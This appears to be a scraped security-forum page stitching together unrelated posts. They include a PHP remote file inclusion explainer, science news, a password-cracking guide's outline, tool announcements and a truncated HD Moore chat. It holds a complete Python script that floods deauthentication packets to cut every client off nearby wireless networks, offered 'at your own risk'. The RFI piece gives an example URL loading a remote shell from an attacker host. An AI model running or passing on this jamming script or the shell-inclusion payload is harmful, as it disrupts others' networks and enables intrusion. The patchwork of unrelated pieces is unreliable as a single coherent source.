begood

We aren't here to talk about theoretical hacks, or "If" scenarios. Call bullshit on us for anything you can't get working or don't think actually happens. Want a white paper put into perspective? Can't quite figure out how a tool or exploit works? or works into a pen test? Thats what we do, shoot a comment, tweet, facebook update our way and we'll feature it on a show. Practical Exploitation

PHP is a scripting language that is deployed on countless web servers and used in many web frameworks. “PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.”[1] In 2007, at least 20 million websites had PHP deployed. The exponential growth of PHP came from the development of LAMP/WAMP stacks. These stand for Linux/Apache/MySQL/PHP and Windows/Apache/MySQL/PHP respectively. These ensure that deployment of PHP applications are simple enough for the most novice web developer. Many of you may have heard of Wordpress, Drupal, or Joomla. These are common web applications that are written entirely in PHP. Many sites run PHP as their main scripting language, such as Youtube, Facebook, Digg, and Wikipedia. PHP also powers cybercrime. A large majority of publicly disclosed vulnerabilities are PHP related. In 2009, 5733 PHP Remote File Inclusion vulnerabilities were disclosed.[2] In situations where exploiting PHP RFI is possible, most likely SQL Injection and Cross Site Scripting are all possible. This is due to the exploits having the same root cause or lacking input validation. What is a PHP Remote File Injection (RFI) attack? A PHP RFI attack occurs when there is unvalidated input to a PHP script. This allows PHP code to be injected by a malicious person. For example, a typical PHP URL would look something like this: www.example.com/errors.php?error=errorsfile.php. How can this be abused to cause PHP RFI? The errors.php script is taking a file as input, which in the example, is errorsfile.php. If the site is vulnerable and does not have input validation, any file could be used as input, even files from remote servers. When the vulnerable server requests www.example.com/errors.php?error=http://evilhaxor.com/remoteshell.php, the remoteshell.php file will be processed by the web server. Attackers can do quite a bit with remotely included PHP files, including opening a shell, enumerating users or programs, and defacing the website. Basically, whatever user the web server is running as, an attacker can run commands as that user. How do we fix PHP RFI? There are several variables within the PHP configuration that can be set to provide a more secure environment for PHP code to run in. These are register_globals, allow_url_fopen, and allow_url_include. In an ideal world, we would be able to set all of these variables in the php.ini file to OFF. However, in most cases this will break applications dependent on these functions. A thorough review of their usage should be done before setting any of them to OFF. Another solution is to implement secure coding practices in PHP, and to implement input validation. Detailing input validation methods and ways to securely code PHP is too complex for this article. However you can discover more by reading the OWASP Top 10 entries for PHP RFI, and the Web Application Security Consortium article on PHP RFI. Both will help you learn about this threat and take precautions for your own network. MSI :: State of Security Understanding PHP RFI Vulnerabilities

In one of the biggest breakthroughs in recent history, scientists have created a synthetic genome that can self-replicate. So what does this mean? Are we about to become gray goo? Led by Craig Venter of the J. Craig Venter Institute (JCVI), the team of scientists combined two existing techniques to transplant synthetic DNA into a bacteria. First they chemically synthesized a bacterial genome, then they used well-known nuclear transfer techniques (used in IVF) to transplant the genome into a bacteria. And apparently the bacteria replicated itself, too, thus creating a second generation of the synthetic DNA. The process is being hailed as revolutionary. How to make a synthetic genome Researchers created a synthetic genome by copying an existing one — Mycoplasma mycoides — and transplanting it into Mycoplasma capricolum. How can we be sure that the M. mycoides is synthetic? When recreating it, the team added a number of non-functional "watermarks" to the genome, making it distinct from the wild version. Once implanted, the M. mycoides genome "booted up" the recipient cells, deleting or disrupting 14 genes. The bacteria went on to function normally, meaning the transplant worked. "This is the first synthetic cell that's been made, and we call it synthetic because the cell is totally derived from a synthetic chromosome, made with four bottles of chemicals on a chemical synthesizer, starting with information in a computer," said Venter. "This becomes a very powerful tool for trying to design what we want biology to do. We have a wide range of applications [in mind]." "If the methods described here can be generalized, design, synthesis , assembly and transplantation of synthetic chromosomes will no longer be a barrier to the progress of synthetic biology," write the authors in the paper (available free online from Science). Proof of concept At present, this is a proof of concept, but has some immense potential for the future. The research team at JVCI have been working on this technology for approximately 15 years, and now have a number of possible organisms planned: an algae that would suck up carbon dioxide and excrete hydrocarbons for biofuels; faster vaccine production; water cleaning; and using light energy to create hydrogen gas from water. As anyone with even a glancing familiarity with scifi knows, self-replicating technology could lead to disaster. JCVI have done their due diligence here, and all their engineered creations require nutrients found in the lab to survive. They also have the technology to create "suicide genes" that will prevent the synthetics from living outside of a controlled environment. Aware of the ethical and security issues involved, JCVI has also been in talks with the U.S. government since 2003, as well as being reviewed by independent bioethics groups since 1997. Ethics of synthetic life So what does this all mean? Beyond the applications I already mentioned, it's also helping us understand how life works - specifically, how it's transmitted through DNA. "This is an important step we think, both scientifically and philosophically. It's certainly changed my views of the definitions of life and how life works," Venter said. Nature has compiled a number of opinions from prominent academics on the project. Everyone acknowledges that this is just the first step in what could be a very interesting development. "We now have an unprecedented opportunity to learn about life. Having complete control over the information in a genome provides a fantastic opportunity to probe the remaining secrets of how it works," says Mark Bedau of Reed College, Oregon. "A prosthetic genome hastens the day when life forms can be made entirely from non-living materials. As such, it will revitalize perennial questions about the significance of life — what it is, why it is important and what role humans should have in its future." Jim Collins of Boston University reminds us that there's still much left we don't know: There's a long way to go with this technology, but this advance is incredibly significant, and from it we may see the dawn of a new revolution in molecular biology and genetic engineering. Press Release, Article in Science http://io9.com/5543843/

The goal is to unify all of the good information found in various bits and pieces into 1 large document. This document is for people who want to learn to the how and why of password cracking. There is a lot of information being presented and you should READ IT ALL BEFORE you attempted doing anything documented here. I do my best to provide step by step instructions along with the reasons for doing it this way. Other times I will point to a particular website where you find the information. In those cases someone else has done what I attempting and did a good or great job and I didn’t want to steal their hard work. These instructions have several excerpts from a combination of posts from pureh@te, granger53, irongeek, PrairieFire, and stasik. I would also like to thank each of them and others for the help they have provided me on the BackTrack forum. I had to compress the document so I could attach it. The document as it stands now is 127K. Please let me know if what I have is wrong, or if there is a better way to do something, or if I am missing something. I am planning on making enhancements as people make me aware of them. Here is the table of contents 1 LM vs. NTLM 2 Syskey 3 Cracking Windows Passwords 3.1 Extracting the hashes from the Windows SAM 3.1.1 Using BackTrack Tools 3.1.1.1 Using bkhive and samdump v1.1.1 (BT2 and BT3) 3.1.1.2 Using samdump2 v2.0.1 (BT4) 3.1.1.3 Cached Credentials 3.1.2 Using Windows Tools 3.1.2.1 Using fgdump 3.1.2.2 Using gsecdump 3.1.2.3 Using pwdump7 3.1.2.4 Cached Credentials 3.2 Extracting the hashes from the Windows SAM remotely 3.2.1 Using BackTrack Tools 3.2.1.1 ettercap 3.2.2 Using Windows Tools 3.2.2.1 Using fgdump 3.3 Cracking Windows Passwords 3.3.1 Using BackTrack Tools 3.3.1.1 John the Ripper BT3 and BT4 3.3.1.1.1 Cracking the LM hash 3.3.1.1.2 Cracking the NTLM hash 3.3.1.1.3 Cracking the NTLM using the cracked LM hash 3.3.1.1.4 Cracking cached credentials 3.3.1.2 John the Ripper - current 3.3.1.2.1 Get and Compile 3.3.1.2.2 Cracking the LM hash 3.3.1.2.3 Cracking the LM hash using known letter(s) in known location(s) (knownforce) 3.3.1.2.4 Cracking the NTLM hash 3.3.1.2.5 Cracking the NTLM hash using the cracked LM hash (dumbforce) 3.3.1.2.6 Cracking cached credentials 3.3.1.3 Using MDCrack 3.3.1.3.1 Cracking the LM hash 3.3.1.3.2 Cracking the NTLM hash 3.3.1.3.3 Cracking the NTLM hash using the cracked LM hash 3.3.1.4 Using Ophcrack 3.3.1.4.1 Cracking the LM hash 3.3.1.4.2 Cracking the NTLM hash 3.3.1.4.3 Cracking the NTLM hash using the cracked LM hash 3.3.2 Using Windows Tools 3.3.2.1 John the Ripper 3.3.2.1.1 Cracking the LM hash 3.3.2.1.2 Cracking the NTLM hash 3.3.2.1.3 Cracking the NTLM hash using the cracked LM hash 3.3.2.1.4 Cracking cached credentials 3.3.2.2 Using MDCrack 3.3.2.2.1 Cracking the LM hash 3.3.2.2.2 Cracking the NTLM hash 3.3.2.2.3 Cracking the NTLM hash using the cracked LM hash 3.3.2.3 Using Ophcrack 3.3.2.3.1 Cracking the LM hash 3.3.2.3.2 Cracking the NTLM hash 3.3.2.3.3 Cracking the NTLM hash using the cracked LM hash 3.3.2.4 Using Cain and Abel 3.3.3 Using a Live CD 3.3.3.1 Ophcrack 4. Changing Windows Passwords 4.1 Changing Local User Passwords 4.1.1 Using BackTrack Tools 4.1.1.1 chntpw 4.1.2 Using a Live CD 4.1.2.1 chntpw 4.1.2.2 System Rescue CD 4.2 Changing Active Directory Passwords 5 plain-text.info 6 Cracking Novell NetWare Passwords 7 Cracking Linux/Unix Passwords 8 Cracking networking equipment passwords 8.1 Using BackTrack tools 8.1.1 Using Hydra 8.1.2 Using Xhydra 8.1.3 Using Medusa 8.1.4 Using John the Ripper to crack a Cisco hash 8.2 Using Windows tools 8.2.1 Using Brutus 9 Cracking Applications 9.1 Cracking Oracle 11g (sha1) 9.2 Cracking Oracle passwords over the wire 9.3 Cracking Office passwords 9.4 Cracking tar passwords 9.5 Cracking zip passwords 9.6 Cracking pdf passwords 10 Wordlists aka Dictionary attack 10.1 Using John the Ripper to generate a wordlist 10.2 Configuring John the Ripper to use a wordlist 10.3 Using crunch to generate a wordlist 10.4 Generate a wordlist from a textfile or website 10.5 Using premade wordlists 10.6 Other wordlist generators 10.7 Manipulating your wordlist 11 Rainbow Tables 11.1 What are they? 11.2 Generating your own 11.2.1 rcrack - obsolete but works 11.2.2 rcracki 11.2.3 rcracki - boinc client 11.2.4 Generating a rainbow table 11.3 WEP cracking 11.4 WPA-PSK 11.4.1 airolib 11.4.2 pyrit 12 Distributed Password cracking 12.1 john 12.2 medussa (not a typo this is not medusa) 13 using a GPU 13.1 cuda - nvidia 13.2 stream - ati Thanks, P.S. Thank you everyone for your feedback. Keep it coming. Changes from version 0.1 * Added a section on plain-text.info * Added a section on using john the ripper with a custom character list * Added Xploitz’s and pureh@te’s wordlists Changes from version 0.2 - 200 downloads * Added sections on using ophcrack * Added sections on Cain and Able under windows * Fixed a typo * New html format Changes from version 0.3 - 410 downloads * Moved some content to where it should have been * Added a section on crunch * Fixed typos * Fixed a whole lot of html issues * Slightly rearranged things to flow better Changes from version 0.4 - 877 downloads * Added a section on cached credentials * Expanded the Novell section * Fixed typos * Fixed a couple of html errors * Moved some things around * New utility to dump passwords Changes from version 0.5 - 1573 downloads * added wpa pw-inspector command * added a wordlist manipulation section * added usage of fgdump * added rcracki section * added a sample hash.txt to play with * john can be used for input to aircrack-ng * moved a few things around for a better flow Changes from version 0.6 - 422 downloads * added a section on generating a wordlist from a website * added head, tail, and sed commands to wordlist manipulation * added a section on xhdrya (pointing to Pureh@te's video) * added a section on gsecdump * added a section on medusa * added a section on cisco * expanded the crunch section * moved everything around in an effort to make things easier to find * the dumbforce and knownforce are not finished Changes from version 0.7 - 4596 downloads * Fixed john --incremental=All --stdout | aircrack-ng -b 00:11:22:33:44:55 -w --test.cap missing a - Thanks to roblad for pointing it out Changes from version 0.8 - 302 + 1226 (old forums + new) * updated the guide to support BT4-Pre-Final * switched from transitional html to strict html * added a section on cracking office passwords * added a section on cracking rar passwords * added a section on cracking zip passwords * added a section on cracking pdf passwords * added instructions for remote password dumping for fgdump * point users to john the ripper wiki for dumbforce and knownforce usage * convert text urls to links * updated links * update versions of software (wine and rcrack) * fixed several spelling mistakes Changes from version 0.9 * updated the guide to support BT4 Final * fixed links to pureh@te's videos * added instructions to update flash so you can watch videos clearly * updated the john the ripper section to current versions * added instructions for using rainbow tables for WPA cracking * added two new leetifing scripts * added a small cupp discussion * added a section on pyrit * added a section on distributed password cracking using john and medussa * added a section on cuda and stream * fixed typo in hash.txt MOD EDIT: Download link for the guide: http://tools.question-defense.com/Cr...ords_Guide.pdf Password Cracking Guide

multumesc

Risky.Biz has confirmed IBM staff distributed malware-infected USB drives at the AusCERT security conference this week. In a highly embarrassing admission, the company has sent a broadcast e-mail to all AusCERT attendees warning them of the security lapse. "At the AusCERT conference this week, you may have collected a complimentary USB key from the IBM booth," the message reads. "Unfortunately we have discovered that some of these USB keys contained malware and we suspect that all USB keys may be affected." IBM is not the first company to distribute malware at AusCERT -- Australian telco Telstra did exactly the same thing in 2008. Risky.Biz confirmed the authenticity of the e-mail message with IBM. For all Risky.Biz coverage of AusCERT, click here. For Risky.Biz podcast feeds click here.

A Honeypot is a device placed on a computer network specifically designed to capture malicious network traffic. The logging capability of a honeypot is far greater than any other network security tool and captures raw packet level data even including the keystrokes and mistakes made by hackers. The captured information is highly valuable as it contains only malicious traffic with little to no false positives. Honeypots are becoming one of the leading security tools used to monitor the latest tricks and exploits of hackers by recording their every move so that the security community can more quickly respond to new exploits. HoneyBOT works by opening a large range of listening sockets on your computer from which a selection of these sockets are designed to mimic vulnerable services. When an attacker connects to these services they are fooled into thinking they are attacking a real server. The honeypot safely captures all communications with the attacker and logs these results for future analysis. Should an attacker attempt an exploit or upload a rootkit or trojan to the server the honeypot environment can safely store these files on your computer for malware collection and analysis purposes. You can download it from here. In this video, Irongeek shows us how to get up and running with HoneyBot. Setting up the HoneyBot Honeypot Tutorial

MetaGooFil is an information gathering tool designed for extracting metadata of public documents such as pdf,doc,xls,ppt,odp,ods available in the target/victim websites. First step for penetration testing any web site or web server is to know what web server is running and after that come information gathering what things are there on web server. MetaGoofil will also help you to discover the MAC address from Microsoft Office documents! So, now you know what hardware are you dealing with! MetaGoofil It will generate a HTML page with the results of the metadata extracted, plus a list of potential usernames very useful for preparing a bruteforce attack on open services like ftp, pop3,web applications, VPN, etc. Also it will extract a list of disclosed PATH’s in the metadata, with this information you can guess OS, network names, Shared resources, etc. A path disclosure found using MetaGooFil: All this information should not be available on the net, but most of the companies don’t have policies about information leaking… and most of them don’t know this information exists. So you can show them what information an attacker can obtain, with this simple technique. How to use MetaGoofil? 1- Search Google, for interesting documents in the target site. Example: site:victim.com filetype: pdf 2- Download all files found, to a local disk and extract metadata, filtering interesting information. 3- Results example, list of path disclosure found on all analyzed files. Now with all the information, you can prepare better your penetration tests. Download MetaGoofil version 1.4b here http://pentestit.com/2010/05/21/metagoofil-tool-metadata-analyzer-information-gathering-tool/

RAMMap v1.0: Have you ever wondered how Windows allocates physical memory or what’s using it? RAMMap is a new utility for analyzing system RAM usage on Windows Vista and Windows 7 that provides insight never before available. RAMMap shows information about each page of memory, summaries of memory usage by type, views of file data stored in memory, and more (portions based on code by Alex Ionescu). Published Wednesday, May 19, 2010 12:46 AM by curtismetz Filed under: RAMMap Sysinternals Site Discussion : New Tool: Sysinternals RAMMap v1.0

(PhysOrg.com) -- All those paper transistors and paper displays that scientists have been designing can now be powered by an onboard power source, thanks to the development of a new paper supercapacitor. Designed by researchers at Stanford University, the paper supercapacitor is made by simply printing carbon nanotubes onto a treated piece of paper. The researchers hope that the integrated design could lead to the development of low-cost, disposable paper electronics. In the paper supercapacitor, all the necessary components are integrated onto a single sheet of paper in the form of single walled carbon nanotubes (SWNTs). High-speed printing could be used to print the SWNTs directly onto a piece of paper - anything from Xerox paper to newspaper and even grocery ads will work. At first, the researchers found that the SWNTs were so small that they penetrated the paper through micron-sized pores, which would cause the device to short-circuit. To solve this problem, the researchers first coated both sides of the paper with polyvinylidene fluoride (PVDF), which blocked the pores but still allowed for electrolytes to be transported through the paper. As such, the treated paper could function as an electrolyte membrane and separator without short-circuiting. “The key design is that SWNTs stick well on paper and do not penetrate through paper completely to avoid shorting,” Yi Cui of Stanford University told PhysOrg.com. Once the SWNTs were printed onto the treated paper, they experienced strong bonding forces similar to those experienced when writing with a pen or pencil on paper. Even when rubbed or subjected to tape, the SWNTs remained attached to the paper. After printing SWNTs on both sides of single sheets of paper, electrolyte was loaded to form a supercapacitor. The SWNTs served as both the electrodes and current collectors in the supercapacitor, which had a capacitance of about 3 F/g. The device also showed an excellent cycling stability, with very little loss of capacitance after 2500 cycles. The researchers say the same concept could be extended to make batteries, as well. The fully integrated supercapacitor is based on an earlier version that the researchers made, in which nanomaterials were coated separately onto different anode and cathode substrates and then assembled together with a separator. The advantage of the new integrated structure is that it allows for high-speed printing, which greatly reduces fabrication costs and brings disposable, flexible, and lightweight paper electronics closer to reality. Cui said that, in the future, the researchers plan “to use this new design for real applications.” Paper supercapacitor could power future paper electronics

(PhysOrg.com) -- Scientists in Europe have created a time capsule they call a 'digital genome,' and deposited it in a bunker known as the Swiss Fort Knox, which lies deep beneath the ski slopes of the Swiss Alps. The aim of the project is to ensure future scientists will be able to decipher data stored using obsolete technologies. The plan is to keep the time capsule at the data storage facility for the next 25 years, locked in a room protected by a 3.5-tonne door. The room is strong enough to survive a nuclear attack. The idea is the culmination of a four-year, 15m Euro ($18.7m US), project known as the “Planets” (from Preservation and Long-term Access through NETworked Services), which drew expertise and data from 16 major European libraries, research universities, technology companies, and archives to address what they call “core digital preservation challenges.” One of the two computer scientists responsible for the capsule, Dr Adam Farquhar of the British Library, said in 50 years’ time we may not be able to take notebooks off the library shelf and read them as we can today with Einstein’s notebooks, since they are likely to be stored digitally. As the technologies are changing rapidly we may not be able to access them. The time capsule is dubbed a “digital genome” because it contains the keys to the data formats, or the digital equivalent of the genetic code of different data formats, and aims to enable future scientists to decode and access data stored using archaic storage systems. The capsule contains information on the vast range of digital formats used since computers became commonplace, and how the different file formats work, documenting how to tell a processor to retrieve the stored data without access to an operating system or other assembled computer program. The project organizers say around 1 trillion CDs-worth of data is stored globally and much of this will not be accessible to future technology, any more than data on the old 5.25 inch floppy disks of the 1970s is accessible to most people today. They say the amount of data, which ranges from holiday photographs to clinical trial data and health records, amounts to 100 GB of data (equivalent to 24 tonnes of books) for every person on the planet. Project organizers estimate the EU loses digital information valued at over three billion Euros every year because of the ever shorter lifespan of the technology, with digital file formats having a lifespan of 5-7 years, and data storage devices such as CDs and DVDs only lasting around 20 years. Professor Andreas Rauber of the University of Technology of Vienna, the second person allowed to handle the time capsule, said digital data has a shelf life of only years, unlike previous data stored as ink on parchment or hieroglyphics carved on stone, which could last for thousands of years. He said if we fail to act now to preserve digital data this could cost billions in the future, but he also said it is impossible to predict what proportion of the data we will not be able to use or access in 25 years’ time. The project should benefit many industries needing to access historical data. The Planet project has made software available online to help people decipher data stored in obsolete formats. More information: PLANETS: Home

Italian police reportedly unearthed hidden dossiers on 'enemies' during a raid on church of Scientology offices in Turin. The files, apparently discovered behind locked doors in a basement office, allegedly contained personal information on judges, police officers and journalists identified as hostile to the church. Details on former Church members who have turned against Scientology were also reportedly recovered from handwritten files and computer records seized following a nine-hour search of the premises. No arrests took place, UPI adds. The bust was reportedly authorised by local magistrates over concerns the local chapter of Scientology was holding sensitive personal data (including information on health and sexual orientation) in violation of Italy's privacy laws, the Daily Telegraph reports. Elsewhere the Church has denied claims in Australia that senior members covered up the alleged sexual abuse of an 11-year-old girl. Former Scientologist Carmen Rainer told ABC's Lateline programme that church officials persuaded her and her mum to lie to the authorities about alleged sexual abuse by her stepfather, Robert Kerr. Church of Scientology officials deny this and say it was only through their involvement in the case that Kerr eventually turned himself in and admitted his crimes. ® 'Dossiers on enemies' found in Italian Scientology raid ? The Register

This is actually a very old flaw as it’s part of the core HTTP standards, it’s exploiting the very way in which the Internet works. Basically most browsers expose browsing history if probed in the right way, the fact was that it was just too resource intensive to get any useful data. Someone has refined the attack using the top 5000 most popular sites, then pulling specific URL data when it gets positive responses on those. With this technique giving them the ability to scan up to 30,000 URLs a second…as soon as you land on the site they can pull the data. I wonder if anyone will start exploiting this to serve more relevant content/ads to users. It’s pretty neat actually, check it out here: http://whattheinternetknowsaboutyou.com/ It correctly identified 11 major sites which I have visited recently and actually displayed the exact Wikipedia pages I’ve visited in the past. They’ve also extended the attack even further to get people’s ZIP codes from sites which utilize it (Weather & Movie sites for example). Plus some other sites I’ve visited (Twitter, Google sites, Archive.org, Speedtest.net etc). It’s still limited in scope as stated by the researchers, but once again it’s a nice extension of an old attack which yields a lot more accurate data. It can also parse out from RSS feeds on news sites to probe for articles you might have recently read if it has already discovered that you have visited the main URL. We’ll have to see how Mozilla attempts to address this in Firefox 4 and if it really works. Many more details are available in a PDF of their report, which you can grab here: p26.pdf Source: The Register

I'm better at rubber-hose cryptanalysis.

can't wait eu n-am acum acces nici timp pentru asta

How to burn down any wireless network around you and how to find out the exact location of a wireless laptop I made a program which will monitor the air for connections between wireless hot spots and hosts, if the program will find a connection it will send a deauth packet which will disconnect the client, this goes at such a high speed that clients will have no chance to establish a proper connection to the router. #!/usr/bin/python try: import sys,os from scapy.all import * except: print "[-] Could not import all needed things, be sure you have Python, aircrack-ng and scapy installed" sys.exit(0) def deauth_flood(p): if p.haslayer(Dot11): mac = {} mac["ap"]=p.sprintf("%Dot11.addr1%") mac["station1"]=p.sprintf("%Dot11.addr2%") if not mac["ap"]=="ff:ff:ff:ff:ff:ff" and mac["station1"]!="None": os.system("aireplay-ng -0 1 -a "+mac["ap"]+" -c "+mac["station1"]+" "+sys.argv[1]+" &")# Remove " &" for a slower attack rate. def instructions(): print "== WLAN blackout - written by Jelmer de Hen - published at http://h.ackack.net ==\n\ninstructions:\n" print "python "+sys.argv[0]+" [iface]" print "python "+sys.argv[0]+" mon0" if len(sys.argv)>1: print "[+] Searching for packets..." sys.exit(sniff(iface=sys.argv[1],prn=deauth_flood)) else: sys.exit(instructions()) Use at your own risk, you won’t be detected too fast since you send entirely spoofed packets but with the right equipment and skills on the side of the victim side he will be able to do it, normally when these kinds of attacks are launched at company’s they will have to ask the ISP to come with a special device which will track down the exact location of the device. But what when you are being targeted by this attack? First you have to know that this might be hard to detect since it can be exploited from very custom locations, think about: - Attacker is at 1 location not too far away; for example in a car - Moving attacker walking around with a laptop in bag - Infected/botted computer(s) of any kind, could even be your heat pump or light system control system in this case - Malicious pineapples - Phones (like the iphone) - Satellite dish pointed to you - Infected satellite Understand that it is impossible to counter some of these attacks but an iphone or car should be tracable. Requirements: - Movable Linux based PC with wireless capability; if you don’t have a *nix system you can download backtrack for free, burn it to a DVD and boot from it; in the case your PC can’t boot DVD’s you can go for an Ubuntu live CD or another distribution, booting from these CD’s won’t change anything to your actual system. - Wireshark (free) - Aircrack-ng (free) optional: - poitable antenna - thin foil - scissors - glue - cardboard (or other hard bendable material) Why thin foil, scissors and cardboard? To locate the attacker; it would be ideal to have a parabolic reflector to decrease the time it will take for localizing the attacker. You can make the windsurfer or be creative and make something custom, the idea is that you can eliminate 1 side of the antenna and reflect that to the side where you point it to increase your range and elimate the chance of the attacker being behind the antenna. When you have all requirements you can get started, move in the middle of the deauth packets storm and turn on Wireshark & airodump-ng. In wireshark apply “radiotap.length==13? as filter (captures all deauth packets) and make a list of all hosts you see in airodump-ng. Look at the rate with which you capture deauth packets and look in the bottom fields for the connections between routers and hosts, look at the PWR levels here. Now move the windsurfer 90 degrees and look at the rate at which you capture and the deauth packets now, decide if it was less or more, redo this progress until you find the location at where the deauth packets have the highest rate, when being in a building it would be smart to also look under and above you. Once you localized the location where the most deauth packets came from move your PC closer to that source, then redo the process of monitoring where the packets come from and look at aircrack-ng. Once you are very very close you can determine which MAC address is doing this by looking it up in airodump-ng, this machine at that moment will have a very low PWR (0 until -50 is good enough). Now run this command in bash to determine the manufacture of the card so you know something more about the attacking machine. cat `locate manuf` | grep 00:11:22 Replace the latest part with the first part of the MAC address for example when you found the MAC address 55:44:33:22:11:00 then 55:44:33 is the part you will need. Please note that this MAC address can be spoofed and/or not broadcasting so you won’t be able to see it, then you have to do it all with Wireshark and determine where the most packets come from. After you did all this you can just grab that malicious pineapple and smash it as hard as you can. This cheap attack vector can form a high risk level during war, when properly exploited an army can attack an entire city by pointing a satellite dish in their direction or think about an attacker which takes over a satellite and reprograms it to be able to do these kind of attacks, with these techniques it will be hard to prevent those attacks unless we will make big thin foil shields around our city’s. I gave you some basic solutions to find the attacker but this antenna detection way works great also for other means, i once tried this on a friend of mine in my old school to find out his location, it was a multi floor school building and i had no idea where he was, within 15 minutes i found him. //care-l testeaza ? How to burn down any wireless network around you and how to find out the exact location of a wireless laptop

Multiupload.com - upload your files to multiple file hosting sites! RapidShare: 1-CLICK Web hosting - Easy Filehosting MEGAUPLOAD - The leading online storage and file delivery service Hotfile.com: One click file hosting: XSS-VIDEOS-SlicK-rstcenter.com.rar zSHARE - XSS-VIDEOS-SlicK-rstcenter.com.rar Download XSS-VIDEOS-SlicK-rstcenter.com.rar for free on uploading.com 2shared - download XSS-VIDEOS-SlicK-rstcenter.com.rar

cred ca ma injura daemien de numa, ask him )))

Multam fratilor ! Zi mai faina ca asta n-am avut (nu ma refer doar la thread )

We conducted our third live chat this week, this one with HD Moore, the founder of the Metasploit Project and the CSO of Rapid7. Moore got a lot of great questions on a wide variety of topics, so if you weren't able to join us, here's a full transcript of the chat. Dennis Fisher: Hi everyone, and welcome to our live chat with HD Moore. Dennis Fisher: This one came in through Twitter: Where did the original idea for Metasploit come from? HD_Moore: Metasploit was started as a curses-based network game similar to "Overkill"; the idea was that the local network would be represented as a grid and live hosts would show up as points on the map. As you ran various exploits, the payload would spawn a listener that echoed the user ID, allowing a network scanner to keep score. It was the game you could play anywhere. The game was originally called "BFEG" - the acronym should make sense for anyone who played DOOM. Dennis_fisher: Via Twitter: what are the commercial plans for metasploit? HD_Moore: As of yesterday, we now offer Metasploit Express - a commercial penetration testing product that is supported by the Rapid7 team and shares a common codebase with the open source Metasploit Framework. The Express product is made up of three components; the open source framework itself, the Workflow Manager, and the User Interface. We are using the exact same framework code in the commercial product as is available for free from the Metasploit.com web site. By using a shared codebase, we have a vested interest in making sure that the open source framework continues to improve. All exploits, payloads, and core functionality in the Express product is available through the open source framework APIs. Dennis_fisher: Are there a lot of companies still that don't think pen testing is important? HD_Moore: Over the last 10 years, awareness of vulnerability assessments and the available tools has increased dramatically. Adoption of penetration testing and the related tools and products is still behind, but this should improve as more companies become aware of the benefits gleaned from penetration testing. I personally feel that the Metasploit project has helped increase awareness in this area. ryanaraine: What's your policy on disclosure as it relates to putting exploits for unpatched vulnerabilities into Metasploit? Is there a "responsible" approach to doing this, in your mind? HD_Moore: The official policy is that any vulnerability in the public domain is fair game to add to the Metasploit Framework. We want to make sure that for any public threat, our users have the ability to test their systems and their defenses, even if no patch is available. Dennis_fisher: What is the craziest\weirdest hardware platform you have seen or heard of that somebody got Metasploit running on? HD_Moore: The most bizarre platform we have ever seen Metasploit running on was a wrist-watch; an attendee of the recent SOURCE Boston conference said that he was able to get Metasploit running on his Linux-based watch, but he had trouble getting the wifi drivers working correctly to use it. Dennis_fisher: via email: will there always be an open source version of the framework? HD_Moore: Absolutely. The great thing about the BSD license is that if we don't do a good job of maintaining the framework, someone else can fork it. That is a great motivator to putting resources into the open source codebase. me: With the integration between Metasploit Express and Nexpose, whats next on the horizon? HD_Moore: Long term we want the NeXpose and Metasploit products to be able to share data in both directions. Right now, we use Metasploit exploit information to help prioritize vulnerabilies in the NeXpose interface, and we have the ability to import NeXpose data into Metasploit (and Metasploit Express). The next step is to bring the results from a penetration test using Metasploit back into the NeXpose interface, and allow ticketing, remediation, and risk prioritization based on live penetration test results danuxx: what would be the difference between Metasploit express and CANVAS/Core Impact? HD_Moore: Tons! The goal of Metasploit Express is to make penetration testing easy to automate and extremely effective; this means going outside of just exploits and automating common penetration testing tasks. We think we made great progress with the first version of Metasploit Express, but this we still have a long way to go. I want penetration testing tools and products to become as commonplace as port scanners and vulnerability assessment tools -- we want penetration testing to become much more mainstream. ryanaraine: a quick follow up: define and "public domain". HD_Moore: By public domain; I mean any exploit being actively exploited in the wild, or where the details or patch are already public danuxx: What is the cost of a Metasploit express license? HD_Moore: Metasploit Express is about $3000 USD, per user, per year Darren: It seems a bulk of the security risks are based around older versions of Windows. Do you see this impacting the frameworks usability in the next 2-5 years? HD_Moore: No doubt that standard buffer overflows are going the way of the dodo when it comes to consumer operation systems. The terrible (or great, depending on what you do) thing is that all of those third-party products and rich client-side applications are still as bad as ever. We are finally seeing reasonable improvements around browser security, but we still have a long way to go before standard exploits become less effective. Long-term, I believe typical code execution flaws will start to dry up as we move to managed code platforms and sandboxes. The move to 64-bit will help as well. However, keep in mind that most of the random SCADA gear being sold today still uses old x86 processors, often running consumer operating systems. Security-Database: As I asked you before when I first see Metasploit merging with Rapid7, should we expect a closed source of metasploit as this happened with Nessus !!! HD_Moore: Absolutely not. Metasploit will always be open source, regardless of what we do on the commercial side. The license guarantees this Dennis_fisher: via email from Mubix: If you had an "I'd rather be" sticker on your car, what would it say? HD_Moore: Scraping This Sticker Off amaged: Where did all the exploit writers that we had back in the early years of this decade went? HD_Moore: Between 2001 and 2003 many of the "old school" exploit developers moved on - some of them changed industry entirely, others went into management, and others continue to write exploits today, but either keep the private, or release them under a new handle. Its still a pretty small world when it comes to exploit development and vulnerability research. ryanaraine: What's the story with that badass Miami Vice white suit at Black Hat last year? Are you breaking it out again? HD_Moore: It was a coordination fail with a friend of mine; here it is, being done right: Quahogcon on Flickr - Photo Sharing! Fitty_RST: Is it true that black_death helped you coding the Metasploit? HD_Moore: The core members of the Metasploit team were Matt Miller (skape) and Spoonm <real name censored>. The handle "black_death" is well known in our private group. Dennis_fisher: from Jack Daniel: what would YOU like to tell us? I know you have lots of knowledge to share. HD_Moore: Find something you love to do, then figure out how to get paid to do it. Too many folks getting started in security look at it as a min/max of optimising skills based on potential salaries. If you are passionate about what you do, the rest is easy brianT: what does the HD stand for? HD_Moore: My first name is actually "H" (one letter), my middle name is "D", this is the name I have always had, but the reason behind it is a much longer story that requires a significant infusion of alcohol to answer. 1epi: What will be the *major* differences between metasploi express and the old one ? HD_Moore: Metasploit Express uses the open source framework; the advantages to Metaspoit Express over the normal framework are ease of use, a slick user interface, commercial support, some really cool automation, detailed audit logs, and reporting. You can see some of the screenshots online at Metasploit Express Gallery - Penetration Testing Accelerated parker: People often ask me how to get started with Metasploit. I tell them to load it in a VM along with a couple different target OS's and start banging on it. They are rarely successful. How would you answer that question? HD_Moore: The hardest part about learning Metasploit is finding a safe target to test against. The Windows licensing model makes it really tough for us to share a standardized image, however, we just released (soon to be announced) a free Linux virtual machine you can use for target practice with both Metasploit and Metasploit Express. You can find the BitTorrent link online at Metasploit Express Community - Penetration Testing Accelerated and a blog post with full details will be available later today danuxx: What do you think about windows os security improvements (SafeSEH, 